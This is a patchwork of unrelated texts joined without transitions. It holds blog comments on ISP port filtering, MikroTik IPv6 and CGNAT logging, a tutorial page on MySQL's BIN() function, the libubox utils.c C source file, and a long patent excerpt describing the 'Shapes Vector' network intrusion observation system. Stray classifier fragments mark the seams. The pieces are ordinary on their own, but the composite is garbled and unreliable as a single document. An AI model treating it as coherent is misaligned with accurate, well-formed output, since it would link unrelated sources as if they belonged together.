ISP’s job is to provide transit capacity and pathways to the public internet, not play traffic police. I’m not sure what the laws and regulations are like in your country of operations, but I certainly wouldn’t want to live there, if the laws permit ISPs to play traffic police, this sounds more like communist China to me.
• Well, we are ISP in Italy since 2011
we never had a single complaint about filtered ports inbound/outbound. They are put to stop spreading the most common malaware. If a customers asks for unfiltered ports, we open them to him, and they are a VERY litte percentage. Since nowhere writes in our legislation that I need to give you open ports or unfiltered network, we put into our contract.
I appreciate your work, but I just throw my opinion to your point.
Regards.
• I do not have knowledge of Italy laws and regulations, so I cannot comment on the legality of it. But if the consumers have no legal protection for “filter-free” internet access, on residential lines and/or commercial/enterprise lines, I’d be gravely concerned as a professional in this domain.
they are a VERY little percentage
That is because most customers are not network engineers, they aren’t technical persons, you know this. It’s not the job of the customer to reverse engineer the ISP and demand the ISP to implement best practices, net neutrality compliant network implementation etc, this is the job of the ISP’s board of directors, management, and engineering team and their governments, to do their due diligence.
I am a strong and vocal supporter of net neutrality-compliant network implementations, including net neutrality-friendly traffic shaping (example bufferbloat control via LibreQoS), therefore network traffic filtering topics, from my side, is driven by my political standpoint on the matter—for context.
I will conclude this with food for thought:
When you buy DIA (IP Transit) from Cogent and Telecom Italia Sparkle, do they perform port-blocking/filtering/traffic policing against your traffic inbound/outbound? Would you prefer if they did?
37. Hello…
well in Italy the regulations are so strict that for example since november 2023 we MUST filter the contents on the our contracts, we MUST implement an adult filtering dns system to filter by default the internet connections, to protect the people with less than 18yo. The customer need to explicity ask to remove the filter.
When we sell lines to residential customers, we filter them by default, and allow a quick opt-out policy if needed (if they have the public IP, since we also offer lines in CGN).
Enterprise customers are unfiltered if they ask to. We just inform them.
About transit, the transit, by default, need to be unfiltered since we are ISP, not an end user.
• DNS/SNI based filtering, is something that, unfortunately is being enforced at a global scale by many governments, this is leading to fragmentation of the internet ecosystem, if Telcos, ISPs, WISPs, globally don’t come together, we’re in deep trouble in the coming decade. It starts with “adult filtering” and then moves to censorship of the press, censorship of journalism etc 🙁
However, as a network engineer myself, you may have noticed, I never mentioned DNS/SNI filtering in my guide, this is because:
1. It does not violate the end-to-end principle of IP Networking.
2. It does not break layer 4 reachability.
3. No packet mangling/molestation.
4. Zero impact to ephemeral ports for UDP, STUN/TURN/Hole punching applications.
5. Network operators are forced by governments, because, well, governments like to play tech-bro, unfortunately.
6. Customers can use DoH/DoQ/DoT/DoH3 of third-party recursives to bypass—But even this is becoming a shit-show, see references below:
A. https://torrentfreak.com/cloudflare-dns-has-to-block-pirate-sites-italian-court-confirms-230403/
B. https://torrentfreak.com/dns-resolver-quad9-loses-global-pirate-site-blocking-case-against-sony-230308/
My recommendation, is to educated your customers (via website? Blog? FAQ? Email?) to have a firewall configured on their CE (customer edge routers) for Layer 3-4 protection (IP, Ports, TCP/UDP/Other L4 protocols). Give them, routers with pre-configured templates. Most CPEs already have stateful firewalling enabled by default by OEMs anyway.
On ISP side, only few ports, in my opinion, have valid use-case for blocking by default with ability for exception on request, port 25 (because of email spammers) and in some countries, SIP ports (call scammers etc).
Side note:
I hope you’re providing native IPv6 with BCOP-690 compliances to your customers.
38. Francisco Mercedes Francisco Mercedes
Hello, would it be possible for you to make a small diagram about the architecture of these configurations?
• The configuration principles and examples are largely topology-independent. “Edge router” configuration is applicable to any router or layer 3 devices that’s stateless, “BNG” configuration is applicable to any router or layer 3 devices that’s stateful.
39. Nick Tait Nick Tait
Hi Daryll.
I have a couple of Mikrotik routers in my home network, so I was very interested in what you said about Router Advertisements being used on all interfaces by default.
However I’ve just done some packet captures, and these seem to paint a different picture to what you described. Specifically my testing shows that while the “ipv6 nd” settings define the Router Advertisement parameters (RA interval, RA lifetime, etc), the decision about whether or not to send Router Advertisements is based on the IPv6 address configurations.
If you run “ipv6 address print” you can see all the configured interfaces and whether or not they are configured to send Router Advertisements.
In particular it is worth noting:
* IPv6 Link-Local addresses (which are assigned to interfaces automatically) don’t generate Router Advertisements. The “export” command doesn’t list these.
* IPv6 addresses that have been added with advertise=no don’t result in Router Advertisements. The “export” command shows “advertise=no” for these addresses.
* IPv6 addresses that don’t have advertise=no will generate Router Advertisements. The “export” command doesn’t show any “advertise” parameter for these addresses.
Rather than advising people to disable the “ipv6 nd” configuration, I think the advice should be to add “advertise=no” to IPv6 addresses that you add, unless you actually do want Router Advertisements sent?
Thanks,
Nick.
40. Manohar Acharya Manohar Acharya
Hi Daryll,
I found your post very useful . I try to follow all the steps you mentioned . I love it . and deployed into my ISP network. But i am still having some confusion . I have switch connected between the path from PPPOE NAS and PPPOE_CLIENT (Huwaei_ONT) . From client end i do the test ping google.com -f -l 1452 without packet fragmentation . On Huwaei ONT wan i have setup MSS of 1480. I want to know what will be the best MSS for that client . I found it could be something like 1452 or less but confuse.
Below is my Simple Topology.
PPPOE-Server>VLANS>Ethernet>LACP>Switch>OLT>ONT (My switch Doesnot support MTU Greater than 1600 and also carry diffrent vlans for BGP(ISP-UPLINK) etc Please suggest what will be the best solution on PPPOE_NAS(MIKROTIK)/ PPPOE_Client(Huawei_ONT).
• The proper solution is to deploy RFC4638 on provider side as per my guide. 1600 MTU on the switch is more than sufficient for client to get native 1500 MTU over PPPoE.
TCP MSS clamping should be disabled in a production network. Use proper MTU.
41. Douglas Fischer Douglas Fischer
Hey Daryll
Things like NAT-Endpoint-Independent and NAT-PMP came into RouterOS.
Other things also.
Do you think this should be included in this optimization guide?
• I’m using EIM-NAT myself in CGNAT production and in home lab. I’ll update the guide to include this next year. But MikroTik EIM-NAT is not on par with Cisco and Juniper as it only supports UDP and not TCP. I suggest you reach out to their official support and ask for Cisco-grade EIM-NAT.
NAT-PMP is 10 years too late, we’re in IPv6 era now. The overhead that comes with NAT-PMP is better spent on something like 464xlat or MAP-T.
42. Douglas Fischer Douglas Fischer
Volume of data with CGNAT logging using Traffic Flow without BPA.
We know that RouterOS does not support Bulk Port Allocation.
And I’m a little curious about the resulting storage volume for this logging scenario through Traffic-Flow without the Bulk port Allocation feature.
From what I understand, it uses NEL – NetFlow Event Logging, but does not use Port Block Allocation / Deallocation events. In other words, each new connection created/closed is a new LOG entry.
Daryll, can you give an estimate of the daily log volume for a real CGNAT scenario, providing a reference for the number of users or Gbps passing through the CGNAT box?
• I don’t think anyone can give reference number as this is a case of complete randomness across different networks and demographics.
But here’s what I do know:
If I have 1000 customers behind single BNG, and all 1k customer router have enabled IPv6 for WAN and LAN, I’ve observed 80-90% traffic for 1k customers going over IPv6 instead, especially for CDN/Content traffic. Remaining 10-20% is CGNAT, with my netmap method.
• Douglas Fischer Douglas Fischer
Well… I can share some reference of CGNAT scenarios using A10 and NFWare, which could provide a basis for comparison.
In scenarios here in Brazil, with Dual-Stack IPv6+IPv4, IPv6 being reasonably well deployed, and IPv4 in CGNAT.
In ISPs with CDNs caches within their own network, which means a certain prioritization of access to cached content.
And also with By-Pass to CGNAT of what is accessed by subscribers to these CDN caches (OCA, GGC, FNA) and also internal servers such as their own recursive DNS.
Configuring BPA to:
– Block of 768 ports in the first allocation.
– Additional blocks of 256 ports.
– Maximum 2048 public ports allocated to each subscriber.
– Connection timeout respecting RFC timeouts (Ex.: 2hours and 4 minutes to TCP).
– Synchronized ranges allocated between TCP and UDP for the same subscriber.
In a network with approximately 15K clients, the box generates a volume of 150-180 Megabytes per day. Resulting in 15-30 Megabytes compressed.
I can also share that in similar scenarios (15K subscribers with IPv6 and CDN caches) where the ISP had very few public IPs available to use in CGNAT, and we had to be more limiting on BPA settings:
– Unsynchronized TCP and UDP range.
– 256 ports for the initial allocated block
– 128 ports for additional allocations
– TCP timeout in 30 minutes.
The volume of daily LOGs increased A LOT!
Approximately 800-900 Megabytes per day. And 120-150 Megabytes compressed.
And it is precisely because of this huge difference that I am curious to see how much volume a log per-connection scenario would bring.
• If you find out the data, let me know as well.
Keep in mind having such short TCP timeout value will affect multiplayer games that rely on TCP for state maintenance etc (gameplay data is over UDP of course).
It sounds like your customer routers on all 15k didn’t have IPv6 enabled for the LAN though.
At some point I’m starting to think it’s better to invest capital into buying v4 block after market to avoid CGNAT logging issues. Of course it’s not cheap.
43. Douglas Fischer Douglas Fischer
“such short TCP timeout”
I believe you are talking about 30 min…
Yep! Is a bug in the ass…
But was the solution we found to so many connections abandoned connections that were present on ConnTrack.
Obs.: This ISP rented some IPs and as we changed the BPA confs it came back “normal” logs volumes.
But with 2 hours and 4 minutes (RFC5382 REQ-5) there are no pain (support tickets from subscribers) related to that..
• Don’t forget to route the public pool to blackhole on the NAT box. This keeps the connection tracking table clean when user is offline or connection breaks etc. In addition to the RFC6890 blackhole.
3 years ago when I tested 2 hour timeout, it breaks CoD Warzone consistently. I stuck with 24 hours ever since + blackhole.
Leave a Reply
Your email address will not be published. Required fields are marked *
Daryll Swer's network engineering blog.
|
__label__pos
| 0.532284 |
Tutorials References Exercises Menu
Paid Courses
SQL Tutorial
SQL HOME SQL Intro SQL Syntax SQL Select SQL Select Distinct SQL Where SQL And, Or, Not SQL Order By SQL Insert Into SQL Null Values SQL Update SQL Delete SQL Select Top SQL Min and Max SQL Count, Avg, Sum SQL Like SQL Wildcards SQL In SQL Between SQL Aliases SQL Joins SQL Inner Join SQL Left Join SQL Right Join SQL Full Join SQL Self Join SQL Union SQL Group By SQL Having SQL Exists SQL Any, All SQL Select Into SQL Insert Into Select SQL Case SQL Null Functions SQL Stored Procedures SQL Comments SQL Operators
SQL Database
SQL Create DB SQL Drop DB SQL Backup DB SQL Create Table SQL Drop Table SQL Alter Table SQL Constraints SQL Not Null SQL Unique SQL Primary Key SQL Foreign Key SQL Check SQL Default SQL Index SQL Auto Increment SQL Dates SQL Views SQL Injection SQL Hosting SQL Data Types
SQL References
SQL Keywords MySQL Functions SQL Server Functions MS Access Functions SQL Quick Ref
SQL Examples
SQL Examples SQL Quiz SQL Exercises SQL Certificate
MySQL BIN() Function
❮ MySQL Functions
Example
Return a binary representation of 15:
SELECT BIN(15);
Try it Yourself »
Definition and Usage
The BIN() function returns a binary representation of a number, as a string value.
Syntax
BIN(number)
Parameter Values
Parameter Description
number Required. A number
Technical Details
Works in: From MySQL 4.0
More Examples
Example
Return a binary representation of 111:
SELECT BIN(111);
Try it Yourself »
Example
Return a binary representation of 8:
SELECT BIN(8);
Try it Yourself »
❮ MySQL Functions
|
__label__pos
| 0.62518 |
avl: add AVL_TREE macro to define an initialized struct avl_tree
[project/libubox.git] / utils.c
1 /*
2 * utils - misc libubox utility functions
3 *
4 * Copyright (C) 2012 Felix Fietkau <[email protected]>
5 *
6 * Permission to use, copy, modify, and/or distribute this software for any
7 * purpose with or without fee is hereby granted, provided that the above
8 * copyright notice and this permission notice appear in all copies.
9 *
10 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
11 * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
12 * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
13 * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
14 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
15 * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
16 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
17 */
18
19 #include "utils.h"
20 #include <stdarg.h>
21 #include <stdlib.h>
22 #include <stdio.h>
23
24 #define foreach_arg(_arg, _addr, _len, _first_addr, _first_len) \
25 for (_addr = (_first_addr), _len = (_first_len); \
26 _addr; \
27 _addr = va_arg(_arg, void **), _len = _addr ? va_arg(_arg, size_t) : 0)
28
29 void *__calloc_a(size_t len, ...)
30 {
31 va_list ap, ap1;
32 void *ret;
33 void **cur_addr;
34 size_t cur_len;
35 int alloc_len = 0;
36 char *ptr;
37
38 va_start(ap, len);
39
40 va_copy(ap1, ap);
41 foreach_arg(ap1, cur_addr, cur_len, &ret, len)
42 alloc_len += cur_len;
43 va_end(ap1);
44
45 ptr = calloc(1, alloc_len);
46 alloc_len = 0;
47 foreach_arg(ap, cur_addr, cur_len, &ret, len) {
48 *cur_addr = &ptr[alloc_len];
49 alloc_len += cur_len;
50 }
51 va_end(ap);
52
53 return ret;
54 }
55
56 #ifdef __APPLE__
57 #include <mach/mach_time.h>
58
59 static void clock_gettime_realtime(struct timespec *tv)
60 {
61 struct timeval _tv;
62
63 gettimeofday(&_tv, NULL);
64 tv->tv_sec = _tv.tv_sec;
65 tv->tv_nsec = _tv.tv_usec * 1000;
66 }
67
68 static void clock_gettime_monotonic(struct timespec *tv)
69 {
70 mach_timebase_info_data_t info;
71 float sec;
72 uint64_t val;
73
74 mach_timebase_info(&info);
75
76 val = mach_absolute_time();
77 tv->tv_nsec = (val * info.numer / info.denom) % 1000000000;
78
79 sec = val;
80 sec *= info.numer;
81 sec /= info.denom;
82 sec /= 1000000000;
83 tv->tv_sec = sec;
84 }
85
86 void clock_gettime(int type, struct timespec *tv)
87 {
88 if (type == CLOCK_REALTIME)
89 return clock_gettime_realtime(tv);
90 else
91 return clock_gettime_monotonic(tv);
92 }
93
94 #endif
|
__label__pos
| 0.989313 |
Search Images Maps Play YouTube News Gmail Drive More »
Sign in
Screen reader users: click this link for accessible mode. Accessible mode has the same essential features but works better with your reader.
Patents
1. Advanced Patent Search
Publication numberUS7027055 B2
Publication typeGrant
Application numberUS 10/312,788
PCT numberPCT/AU2002/000527
Publication dateApr 11, 2006
Filing dateApr 30, 2002
Priority dateApr 30, 2001
Fee statusLapsed
Also published asCA2414174A1, CA2414177A1, CA2414181A1, CA2414184A1, CA2414194A1, CA2414194C, EP1350160A1, EP1350160A4, EP1384137A1, EP1384137A4, EP1384138A1, EP1384138A4, EP1384139A1, EP1384139A4, EP1384159A1, EP1384159A4, US7085683, US7250944, US8121973, US20030191608, US20040017403, US20040034795, US20040036721, US20040059436, US20080216094, WO2002088924A1, WO2002088925A1, WO2002088926A1, WO2002088927A1, WO2002088988A1
Publication number10312788, 312788, PCT/2002/527, PCT/AU/2/000527, PCT/AU/2/00527, PCT/AU/2002/000527, PCT/AU/2002/00527, PCT/AU2/000527, PCT/AU2/00527, PCT/AU2000527, PCT/AU2002/000527, PCT/AU2002/00527, PCT/AU2002000527, PCT/AU200200527, PCT/AU200527, US 7027055 B2, US 7027055B2, US-B2-7027055, US7027055 B2, US7027055B2
InventorsMark Stephen Anderson, Dean Crawford Engelhardt, Damian Andrew Marriott, Suneel Singh Randhawa
Original AssigneeThe Commonwealth Of Australia
Export CitationBiBTeX, EndNote, RefMan
External Links: USPTO, USPTO Assignment, Espacenet
Data view of a modelling system
US 7027055 B2
Abstract
An observation sub-system is described wherein in three-dimensional (3D) views of objects and their interactions over time are provided. Each different view is based on a fundamental visualization paradigm. Heavily interacting objects can be depicted as being located “close together”. Rules are created so as to define the position of objects not only from the perspective of whether interaction occurred, but also the amount of interaction, and the rate of interaction. Despite using proximity to show whether an object is interacting with another, further visual mechanisms are used for the user to be able to analyze the type of data interaction, and the current state of affairs of interaction within a specified time slice. There are two types of forces acting on objects in the data view universe, gravitational (as a result of the mass of an object) and electrostatic (as a result of the charge on an object).
Images(20)
Previous page
Next page
Claims(68)
1. A system for creating human observable objects in a modelling system consists of:
one or more representations of real or virtual objects;
one or more virtual universes wherein
a universe selection function determines whether a representation of a real or virtual object is presented as one or more virtual objects in one or more virtual universes; and
a start position function determines the start position of a virtual object in a universe;
a mapping from a representation of a real or virtual object to a virtual object with one or more visual, aural or haptic attributes and force related properties such that the position of a virtual object in a universe is determined by the force-related properties of said virtual object and the relative position and force related properties of zero or more other virtual objects.
2. A system according to claim 1 wherein a human determines said universe selection function.
3. A system according to claim 1 wherein a human determines said start position function.
4. A system according to claim 3 wherein said start position function places all virtual objects in a random position.
5. A system according to claim 3 wherein said start position function places all virtual objects in a conmmon position.
6. A system according to claim 3 wherein said start position function places all virtual objects evenly distributed about the edge of said universe.
7. A system according to claim 1 wherein a real or virtual object is presented in zero or more virtual universes.
8. A system according to claim 1 wherein a said universe is two or three-dimensional.
9. A system according to claim 1 or 8 wherein a said universe has finite size and said virtual objects are constrained to be positioned within said universe.
10. A system according to claim 1 wherein said human observes a said universe from any position with any orientation.
11. A system according to claim 1 wherein a virtual object is deleted or changed.
12. A system according to claim 1 wherein a virtual object is added.
13. A system according to claim 1 wherein said mapping is changed.
14. A system according to claim 1 wherein force-related properties comprise attractive and/or repulsive force components between virtual objects and within a universe are calculated and summed to produce a resultant force and consequent possible change in position of a virtual object.
15. A system according to claim 1 wherein virtual objects can be grouped and said group has force related properties that are the aggregate of the force-related properties of the elements of said group.
16. A system according to claim 1 wherein a human temporarily changes the attributes or position of one or more virtual objects.
17. A system according to claim 1 wherein a function determined by a human determines a set of selected real or virtual objects that have a corresponding virtual object's attributes or position changed.
18. A system according to claim 17 wherein said human controls the degree of change.
19. A system according to claim 17 or 18 wherein a further function determined by a human determines a subset of said selected real or virtual objects that have a corresponding virtual object's attributes changed.
20. A system according to claim 1 wherein a human temporarily changes the attributes or position of one or more virtual objects for a predetermined period.
21. A system according to claim 17 wherein a corresponding virtual object's attributes or position are changed for a predetermined period.
22. A system according to claim 20 or 21 wherein said period begins when a predetermined state in a respective universe occurs.
23. A system according to claim 20 or 21 wherein said period begins at a predetermined time.
24. A system according to claims 20 or 21 wherein said period begins periodically.
25. A system according to claim 24 wherein said periodicity is changed by said human.
26. A system according to claim 1 wherein said universe selection function is changed.
27. A system according to claim 1 wherein universes can be added or deleted.
28. A system according to claim 1 wherein one or more universes is temporarily not human observable.
29. A system according to claim 1 wherein one or more universes is human observable at the same time.
30. A system according to claim 29 wherein said human determines the way in which a said one or more universe is represented.
31. A system according to claim 1 wherein said force-related properties are constrained to act within two or three dimensions.
32. A system according to claim 1 wherein a human determines the limit of the rate of change in position of a virtual object.
33. A system according to claim 1 wherein a function determined by a human determines a set of selected real of virtual objects that will also determine a corresponding virtual object's force related properties.
34. A system according to claim 33 wherein a force related property of a virtual object may result from being associated with one or more of said sets where force-related properties comprise attractive and/or repulsive force components between virtual objects and within a universe are calculated and summed to produce a resultant force and consequent possible change in position of a virtual object.
35. A system according to claim 33 wherein a human determines whether force related properties are to apply so as to create an interaction set of virtual objects.
36. A system according to claim 1 wherein a human determines that one or more of the force related properties of a virtual object decays over time.
37. A system according to claim 36 wherein said decay is zero or in accordance with a predetermined time related function.
38. A system according to claim 14 wherein the rate of change in a position of a virtual object is proportional to the resultant force exerted.
39. A system according to claim 14 wherein the rate of change of the rate of change in position of a virtual object is proportional to the resultant force exerted.
40. A system according to claim 1 wherein a human determines sets of virtual objects for which one or more prior positions are represented.
41. A system according to claim 40 wherein a human determines the time interval between the corresponding times of said one or more prior positions.
42. A system according to claim 41 wherein the representation is made visible.
43. A system according to claim 41 wherein a human determines the colour and transparency of the representation.
44. A system according to claim 41 wherein a human determines the number of representations to be made visible.
45. A system according to claim 1 wherein a human determines a set of virtual objects and also the relationship between virtual objects such that all virtual objects within the set have that relationship with any other virtual object that exists in the same universe or any other universe.
46. A system according to claim 45 wherein said relationship is represented by a line between virtual objects of predetermined style, width and colour.
47. A system according to claim 46 wherein a human determines when the representation is temporally not human observable.
48. A system according to claim 47 wherein a human can control the state of the representation by manipulation of a control device.
49. A system according to claim 48 wherein said control device is physically manipulated.
50. A system according to claim 48 wherein said control device is aurally manipulated.
51. A system according to claim 1 wherein a human determines a subset of virtual objects and also determines a radius of influence for each virtual object in said subset such that according to the force related properties of said virtual objects there is interaction with other virtual objects within the said radius of influence within the same universe.
52. A system according to claim 51 wherein a human determines the subset of virtual objects for which a radius of influence is represented.
53. A system according to claim 52 wherein the representation of a predetermined style, size and colour.
54. A system according to claim 51 wherein a human determines when the representation is temporarily not human observable.
55. A system according to claim 51 wherein a human can control the state of the representation by manipulation of a control device.
56. A system according to claim 55 wherein said control device is physically manipulated.
57. A system according to claim 55 wherein said control device is aurally manipulated.
58. A system according to claim 1 wherein a human determined perturbation function is applied to all virtual objects in a universe.
59. A system according to claim 58 wherein a human determines a set of zero or more virtual objects that are to be fixed in position before a perturbation such that the position of those virtual objects remains unchanged as a result of said perturbation.
60. A system according to claim 58 wherein a human determines a set of zero or more virtual objects that are to be fixed in position after a perturbation.
61. A system according to claim 58 wherein said perturbation function is a random positioning of said virtual objects.
62. A system according to claim 58 wherein said perturbation function is a movement in a random direction of virtual objects from their current position by a constrained random distance.
63. A system according to claim 58 wherein said perturbation function is a positioning of said virtual objects to a common position.
64. A system according to claim 58 wherein said perturbation function is a positioning of said virtual objects so as to be evenly distributed about the edge of said universe.
65. A system according to claim 1 wherein a human determines the position of one or more virtual objects.
66. A system according to claim 1 wherein a human determines the position of a subset of virtual objects that maintain their position within the universe.
67. A system according to claim 1 wherein a human determines the position and period of existence of a force related property within a universe.
68. A system according to claim 1 wherein said mapping determines an attribute value according to the first attribute,condition pair of an ordered list of pairs where the condition is satisfied by the representation of the real or virtual object.
Description
PART 1 SHAPES VECTOR 1 Shapes Vector Introduction
Shapes Vector is the name given by the inventors to a particular collection of highly versatile but independent systems that can be used to make real world systems observable by a human operator. By providing an observation system the human may be able to detect using one or more of their senses anomalies and the like in the real world system. More particularly, the invention/s disclosed herein are in the field of information observation and management.
To assist the reader, a particular combination of these elements is described in an example. The example is in the field of computer network intrusion detection, network security management and event surveillance in computer networks. It will however be apparent to those skilled in the art that the elements herein described can exist and operate separately and in different fields and combinations to that used in the example.
The different system elements developed by the inventors are the result of the use of several unusual paradigms that while separately make a their contribution also act synergistically to enhance the overall performance and utility of the arrangement they form part of.
An embodiment in the computer network field is used to illustrate an observation paradigm that works with a collection of elements, to provide a near real-time way for observing information infrastructures and data movement. The user (human observer) is provided sophisticated controls and interaction mechanisms that will make it easier for them to detect computer network intrusion and critical security management events in real time as well as allow them to better analyse past events. The user may be computer assisted as will be noted where appropriate.
However, as stated previously each of the elements of the system disclosed herein are also capable of being used independently of the other. It is possible for each of them to be used in different combinations, alone or in conjunction with other elements as well as being the precursor for elements not yet created to suit a particular environment or application.
Whilst the Shapes Vector embodiment provided is primarily meant to aid computer intrusion detection, the system and or components of it, can be arranged to suit a variety of other applications, e.g data and knowledge mining, crnumand and control, and macro logistics.
Shapes Vector is a development in which a number of key technologies have been created that include:
• a high-performance multi-layer observation facility presenting the user with a semantically dense depiction of the network under consideration. To cater to the individual observational capacities and preferences of user analysts, the specifics of the depiction are highly user-customable and allow use of more than just the users visual and mental skill;
• a framework for “intelligent agents”; artificial intelligent software entities which are tasked with co-operatively processing voluminous raw factual observations. The agents can generate a semantically higher-level picture of the network, which incorporates security relevant knowledge explicitly or implicitly contained within the raw input (however, such agents can be used to process other types of knowledge);
• special user interface hardware designed especially to support Defensive Information Operations in which several user analysts operate in real-time collaboration (Team-Based Defensive Information Operations).
• an inferencing strategy which can coexist with traditional deductive mechanisms. This inferencing strategy can introduce certainty measures for related concepts.
The subject matter of this disclosure is complicated and it is both a hindrance and a necessity to present particular elements of the Shapes Vector system in the same document.
However, it will be apparent to those skilled in the art that each element that makes up the Shapes Vector system is capable of independent existence and operation in different environments.
To reflect to some degree the independence of the elements disclosed, this specification is comprised of different parts that each have their own paragraph numbering but page numbering is consistent with their being included in a single document.
• Part 1
• Shapes Vector Introduction
• Part 2
• Shapes Vector Master Architecture and Intelligent Agent Architecture
• Part 3
• Data View Specification
• Part 4
• Geo View Specification
• Part 5
• Tardis (Event Handler) Specification
A detailed index of the various parts and sections is provided on the last pages of the specification to assist random access to the information provided herein or to make cross-referencing simpler.
Part 1 is an overview of the Shapes Vector embodiment that describes a particular environment and discloses in a general way some of the elements that make up the total system. Parts 2, 3, 4 and 5 disclose fundamental aspects of the Intelligent Agent Architecture, Data View, Geo View and the Tardis (Event Handler) specification respectively, terms that will be more familiar once the specification is read and understood.
This patent specification introduces the Shapes Vector system by firstly describing in Sections 1 and 2 of Part 1, the details of its top-level architecture. Included are details of the hardware and software components present in a system presently under construction. Section 3 of Part 1, gives an overview of the first set of observation (some times referred to as visualisation) paradigms, which have been incorporated into the system. Two different views of computer/telecommunications networks are described in this section, both presenting a three-dimensional “cyberspace” but with vastly different approaches to the types of entities modelled in the space and how they are positioned (and dynamically repositioned). Some preliminary comments are offered as to the effectiveness of one of these views, “Geo View”, for network defence. “Geo View” is another of those terms that will be better understood after a reading of the document.
A description of the intelligent agent architecture follows in Section 4 of Part 1, including an overview of the multi-layered Shapes Vector Knowledge Architecture (SVKA) plus details of the inferencing strategies. The knowledge processing approach is very general, and is applicable to a wide variety of problems. Sections 5 and 6 of Part 1 describe special techniques employed within the Tardis (Event Handling) system to assist a user analyst to observe the time-varying behaviour of a network. Two principal mechanisms are detailed, Synthetic Strobes and Selective Zoom, along with some hypotheses as to how such mechanisms might be extended to offer even greater flexibility. Section 7 of Part 1 of the patent specification details a comparative analysis of related research and a set of conclusions summarising the broad thrusts of the Shapes Vector system.
More detailed disclosures of these elements of the invention are provided in Parts 2, 3, 4 and 5.
In reading this specification, it should be noted that while some issues are dealt with in detail, the specification is also used to disclose as many of the paradigms and strategies employed as possible, rather than discussing any one paradigm in depth. In an attempt to provide an example of how these paradigms and strategies are used, several new mechanisms for dealing with information in a real-time environment are described in the context of the information security field but in no way are the examples meant to limit the application of the mechanisms revealed.
Observation is a term used in this specification to embody the ability of a human to observe by experience through a variety of their senses. The senses most used by a human user include sight, hearing and touch. In the embodiment and system developed thus far all of those senses have been catered for. However, the term observe is not used in any limiting way. It may become possible for a human's other senses to be used to advantage not only in the scenario of computer system security but others within the realm of the imagination of the designer using the principles and ideas disclosed herein. A human could possibly usefully use their other senses of smell, taste and balance in particular future applications.
In this specification the term clients is used to refer to a source of events based on real and virtual objects operating in the real world and the term monitors is used to refer to one or more recipient systems that make the events observable to a human user.
The following discussion will provide background information relating to the described embodiment of the invention or existing paradigms and strategies and when it does so it is intended purely to facilitate a better understanding of the invention/s disclosed herein. However, it should be appreciated that any discussion of background information is not an acknowledgment or admission that any of that material was published, known or part of the common general knowledge as at the filing date of the application.
BRIEF DESCRIPTION OF THE FIGURES
FIG. 1 illustrates a Shapes Vector Functional Architecture.
FIG. 2 illustrates a Hardware Component Architecture.
FIG. 3 illustrates a Distribution of Software Modules.
FIG. 4 illustrates a Geo Network View.
FIG. 5 illustrates a Geo View inside a Machine.
FIG. 6 illustrates a Data View.
FIG. 7 illustrates a Shapes Vector Knowledge Architecture.
FIG. 8 illustrates a Vector Spaces for Agents Inference.
FIG. 9 illustrates Selective Zoom with staircasing.
FIG. 10 illustrates IA Time Apertures along a Data Stream.
FIG. 11 illustrates Shapes Vector Tactical Control.
FIG. 12 illustrates agent assertion router concepts for a single Locale Gestalt of 4 Levels.
FIG. 13 shows a more comprehensive example of the FIG. 12 example.
FIG. 14 illustrates BASS Configuration.
FIG. 15 shows an overview diagram for GeoView.
FIG. 16 shows the processing within the CCI thread as part of the GeoView thread diagram.
FIG. 17 shows a class relationship diagram for a Layout Class Hierarchy.
FIG. 18 shows a Logical Object View of the types of parent-child relationships allowable in the data structure and how these classes work together to form the logical object view of the GeoView visual system.
FIG. 19 shows the Object Layout Structure.
FIG. 20 shows what the DIRECTION and ORIGIN line will look like with various GenencLine combinations
FIG. 21 shows a five-object ring with CLOCKWISE direction.
FIG. 22 illustrates the process interactions between the View Applications (GeoView/DataView) the Registry, and the Tardis.
FIG. 23 illustrates Event Formats.
FIG. 24 illustrates Shared Memory Use.
FIG. 25 illustrates Synthetic Time.
FIG. 26 illustrates Tardis Components.
FIG. 27 illustrates a Process and Thread Activity Graph.
FIG. 28 illustrates a Tardis Store.
FIG. 29 illustrates a Tardis Clock.
2 ARCHITECTURAL COMPONENTS
2.1 Primary Functional Architecture
At the coarsest level, the Shapes Vector system can be considered to be composed of a series of “macro-objects,” shown in FIG. 1. These modules interact with one another in various ways: the lines in the figure indicate which objects interact with others. The functions performed by each of these macro-objects and the purpose and meaning of the various inter-object interactions are described in the parts and sections that follow.
2.1.1 Configuration Interface and I/O Sub-system
The Configuration Interface and I/O macro-objects collectively encapsulate all functionality, involving interaction with the user of the Shapes Vector system. They in turn interact with the Display, Tardis (Event Management) and Intelligent Agent macro-objects to carry out the user's request. In addition to being the point of user interaction with the system, this user-interface macro-object also provides the ability to customise this interaction. Refer to FIG. 1, which displays the Functional Architecture of Shapes Vector. A user can interactively specify key parameters, which govern the visual and other environments generated by Shapes Vector and the modes of interaction with those environments. Such configurations can be stored and retrieved across sessions allowing for personal customisation.
Individual users can set up multiple configurations for different roles for which they might wish to use the system. Extensive undo/redo capabilities are provided in order to assist with the investigation of desired configurations.
The observation of the Shapes Vector world is user-customable by direct interaction with a structure called the “Master Table” (see Section 3). In this table the user can in one example, associate visual attributes, such as shape, colour and texture, with classes of objects and their security-relevant attributes.
A user interacts with the Shapes Vector system via any number of input and output devices, which may be configured according to each individual user's preferences. The input devices may be configured at a device-specific level, for example by setting the acceleration of a trackball, and at a functional level, by way of further example, by assigning a trackball to steer a visual navigation through a 3-dimensional virtual world representative of a computer network. The Appendix to Part 1 describes the typical user interface hardware presented to a Shapes Vector user.
2.1.2 Sensors
Sensors can take many forms. They can be logical or physical. A typical example would be an Ethernet packet sniffer set to tap raw packets on a network. In another example, the sensor can be the output of a PC located at a remote part of a network, which undertakes pre-processing before sending its readings of itself or the network back to the main Shapes Vector system components. Other examples are Software or Hardware to capture packets in a digital communication network, to examine the internal or operating state of a computer or to analyse audit records created by a computer of network device. Sensors transmit their data into the level one portion of the Intelligent Agent Gestalt (this term will also have more meaning after further reading of the specification) for further processing. Some of the processing involved could entail massaging of data for Knowledge Base storage, or perhaps simple logical deductions (first order logic facts).
2.1.3 Intelligent Agent Architecture
